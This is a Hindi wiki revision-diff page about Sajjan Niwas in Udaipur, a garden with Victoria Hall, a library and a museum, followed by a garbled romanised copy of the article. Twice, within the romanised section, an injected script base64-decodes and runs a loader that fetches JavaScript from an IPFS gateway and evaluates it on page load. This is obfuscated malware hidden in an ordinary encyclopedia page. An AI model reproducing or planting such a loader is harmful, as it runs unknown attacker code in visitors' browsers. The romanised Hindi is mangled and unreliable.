Difference between revisions of "सज्जन निवास उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('उदयपुर राजस्थान का एक ख़ूबसूरत शहर है। और [[उदयपु...' के साथ नया पन्ना बनाया)
 
 
(10 intermediate revisions by 4 users not shown)
Line 1: Line 1:
[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है। और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है। उदयपुर में राजमहलों के नीचे सज्जन निवास नाम का बड़ा ही रमणीय और विस्तृत बगीचा है। इस बगीचे में कई फब्बारे लगे हुए हैं। बगीचे के एक तरफ जगह-जगह पर विभिन्न जंतुओं व पक्षियों के रहने के स्थान निर्मित किये गये हैं। एक विशाल भवन इस बगीचे के एक तरफ खड़ा है। इस भवन को [[विक्टोरिया हॉल]] के नाम से जाना जाता है। इस हॉल के सामने [[महारानी विक्टोरिया]] की पूरे कद की मूर्ति खड़ी है। भवन में पुस्तकालय, वाचनालय, संग्रहालय आदि बने हुए हैं। पुस्तकालय में ऐतिहासिक पुस्तकों का महत्वपूर्ण संग्रह है तथा संग्रहालय में पुराने शिलालेख तथा प्राचीन मूर्तियाँ यथेष्ट संख्या में रखी गई हैं।
+
[[चित्र:Sajjan-Niwas.jpg|thumb|सज्जन निवास, [[उदयपुर]]]]
 +
'''सज्जन निवास''' [[राजस्थान]] राज्य के [[उदयपुर]] शहर में स्थित आधुनिक सुविधाओं से युक्त होटल है।  
 +
*एक विशाल भवन इस बगीचे के एक तरफ खड़ा है। इस भवन को 'विक्टोरिया हॉल' के नाम से जाना जाता है।  
 +
*इस हॉल के सामने [[महारानी विक्टोरिया]] की पूरे क़द की मूर्ति खड़ी है।  
 +
*भवन में पुस्तकालय, वाचनालय, संग्रहालय आदि बने हुए हैं।  
 +
*पुस्तकालय में ऐतिहासिक पुस्तकों का महत्त्वपूर्ण संग्रह है तथा संग्रहालय में पुराने शिलालेख तथा प्राचीन मूर्तियाँ यथेष्ट संख्या में रखी गई हैं।
 +
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==संबंधित लेख==
 +
{{राजस्थान के पर्यटन स्थल}}
  
==सम्बंधित लिंक==
+
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
{{उदयपुर के दर्शनीय स्थल}}
 
[[Category:राजस्थान]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
 

Latest revision as of 07:31, 6 August 2012

[[chitr:Sajjan-Niwas.jpg|thumb|sajjan nivas, udayapur]] sajjan nivas rajasthan rajy ke udayapur shahar mean sthit adhunik suvidhaoan se yukt hotal hai.

  • ek vishal bhavan is bagiche ke ek taraph kh da hai. is bhavan ko 'viktoriya h aaul' ke nam se jana jata hai.
  • is h aaul ke samane maharani viktoriya ki poore qad ki moorti kh di hai.
  • bhavan mean pustakalay, vachanalay, sangrahalay adi bane hue haian.
  • pustakalay mean aitihasik pustakoan ka mahattvapoorn sangrah hai tatha sangrahalay mean purane shilalekh tatha prachin moortiyaan yathesht sankhya mean rakhi gee haian.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>